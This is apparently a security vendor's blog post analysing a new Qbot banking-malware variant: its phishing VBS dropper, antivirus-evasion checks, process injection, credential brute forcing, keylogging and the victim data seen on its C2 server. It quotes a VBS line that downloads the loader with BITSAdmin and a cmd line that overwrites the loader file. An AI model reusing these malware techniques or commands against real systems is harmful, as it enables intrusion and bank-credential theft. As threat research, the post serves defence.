Varonis debuts trailblazing features for securing Salesforce. Learn More

Varonis named a Leader in The Forrester Wave™: Data Security Platforms, Q1 2023

Read the report

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims

4 min read
Last updated Mar 03, 2022


    The Varonis Security Research team discovered a global cyber attack campaign leveraging a new strain of the Qbot banking malware. The campaign is actively targeting U.S. corporations but has hit networks worldwide—with victims throughout Europe, Asia, and South America—with a goal of stealing proprietary financial information, including bank account credentials.

    During the analysis, we reversed this strain of Qbot and identified the attacker’s active command and control server, allowing us to determine the scale of the attack. Based on direct observation of the C2 server, thousands of victims around the globe are compromised and under active control by the attackers. Additional information uncovered from the C&C server exposed traces of the threat actors behind this campaign.

    The attack was initially detected by Varonis DatAlert which alerted one of our North American customers of dropper activity, internal lateral movement, and suspicious network activity.

    Our team has shared additional non-public information with the appropriate authorities and are performing responsible disclosure.

    New Variant of Qbot Banking Malware

    The threat actors used a new variant of Qbot, a well-known and sophisticated malware designed to steal banking credentials. Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders.

    The malware is polymorphic, or constantly changing:

    • It creates files and folders with random names
    • Its dropper frequently changes C2 servers
    • The malware loader changes when there is an active internet connection (more on this later)

    Qbot (or Qakbot) was first identified in 2009 and has evolved significantly. It is primarily designed for collecting browsing activity and data related to financial websites. Its worm-like capabilities allow it to spread across an organization’s network and infect other systems.


    Our forensics team began investigating after receiving a call from a customer, whose implementation of DatAlert had alerted them to unusual activity in their systems. Our team determined that at least one computer had been infected with malware and was attempting to propagate to additional systems on the network.

    A sample was extracted and sent to our research team for analysis, who identified the malware as a variant of Qbot/Qakbot. The sample did not match any existing hashes, and further investigation revealed that this was a new strain.

    Phase One – Dropper

    File name: REQ_02132019b.doc.vbs

    versions of Qbot

    In previous versions of Qbot, the first launcher was a Word document macro. A zip file with a .doc.vbs extension was found during our investigation, indicating that the first infection was likely carried out via a phishing email that lured the victim into running the malicious VBS file.

    Upon execution, the VBS extracts the OS version of the victim’s machine and attempts to detect common anti-virus software installed on the system.

    AV strings the malware looks for include: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, Mcafee, symantec

    In this variant, the malware uses BITSAdmin to download the loader. This appears to be a new behavior, as previous samples used PowerShell.

    BITSAdmin downloads the loader from one of the following URLs:

    Downloading the loader using BITSAdmin from the VBS code

    Downloading the loader using BITSAdmin from the VBS code:

    intReturn = wShell.Run(‘bitsadmin /transfer qahdejob’ & Second(Now) & ‘ /Priority HIGH ‘ & el & urlStr & ‘ ‘ & tempFile, 0, True)

    Phase Two: Gain Persistency and Inject to explorer.exe

    Filename: widgetcontrol.png

    multiple versions and is constantly updating even after execution

    The loader, which executes the core malware, has multiple versions and is constantly updating even after execution. The version that the victim receives upon infection is dependent on the sp parameter that is hardcoded in the VBS file.

    One interesting point is that each version of the loader is signed with a different digital certificate. Valid certificates usually indicate a file is trustworthy, while unsigned executables are suspicious.

    Qbot is known to use fake or stolen, valid digital certificates to gain credibility and evade detection on the operating system.

    We downloaded all the available versions of the loader (see IOCs below) and mapped the certificates.

    Certificates used by the malware:

    • Saiitech Systems Limited
    • ECDJB Limited
    • Hitish Patel Consulting Ltd
    • Doorga Limited
    • Austek Consulting Limited
    • IO Pro Limited
    • Vercoe IT Ltd
    • Edsabame Consultants Ltd

    Example of one of the certificates:



    When first run, the loader copies itself to %Appdata%\Roaming\{Randomized String} and then creates the following:

    Injected Explorer

    Injected Explorer.exe

    The loader launches a 32-bit explorer.exe process and then injects the main payloads.

    Here is the memory of explorer.exe with the injected payload as RWX memory segment:

    Here is the memory of explorer.exe with the injected payload as RWX memory segment:

    loader overwrites its original executable with the 32-bit version of calc

    After the injection, the loader overwrites its original executable with the 32-bit version of calc.exe:

    “C:\Windows\System32\cmd.exe” /c ping.exe -n 6 & type “C:\Windows\System32\calc.exe” > C:\Users\{TKTKTK}\Desktop\1.exe

    Phase Three: Lateral Movement and Stealing Money

    After establishing persistence, the main payloads begin to brute force accounts on the network.

    If the malware compromises a domain account, it enumerates the “Domain Users” group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.

    Authentication attempts use NTLM, and the API WNetAddConnection.

    We extracted the usernames and passwords the malware uses when attempting to brute force local accounts. The malware hides these dictionaries from static analysis, but they can be extracted during runtime.

    X32dbg image of explorer.exe trying to connect to a remote computer with the username “Administrator” and the password “12345678”:

    Show Me the Money

    Show Me the Money

    The main goal of Qbot is to steal money from its victims; it uses several methods to send financial, credential and other information back to the attacker’s server:

    • Keylogging – Qbot captures and sends every keystroke that the victim enters and uploads them to the attacker.
    • Credentials/cookies – Qbot searches for saved credentials/cookies from browsers and sends them to the attacker.
    • Hooking – the main payload injects to all the processes in the system with a code that hooks API calls and searches for financial/banking string the malware extracts the data, credentials, or session cookies from the process and uploads it to the attacker.

    The image shows that when authenticating to banking site, the malware sends the POST data and the session cookies to the C2 server

    Inside the Attacker’s C2 Serve

    Inside the Attacker’s C2 Server

    On one of the attacker’s sites, we were able to find log files containing the victim IPs, operating system details, and anti-virus product names. The C2 server revealed past activities, as well as what appears to be additional malware versions (version table in the IOC section, below).

    Github repository

    Some of the results may contain duplicates, but below are the top 10 countries, anti-virus products, and operating systems found.

    Victims by Country

    We found 2,726 unique victim IP addresses. As many organizations use port address translation that masks internal IP addresses, the number of victims is likely much larger.

    Victims by Anti-Virus Found

    Victims by Anti-Virus Found

    Victims by Operating System

    Victims by Operating System


    What you should do now

    Below are three ways we can help you begin your journey to reducing data risk at your company:

    1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
    2. Download our free report and learn the risks associated with SaaS data exposure.
    3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Twitter, Reddit, or Facebook.

    Free Data Risk Assessment

    Join 7,000+ organizations that traded data darkness for automated protection. Get started in minutes.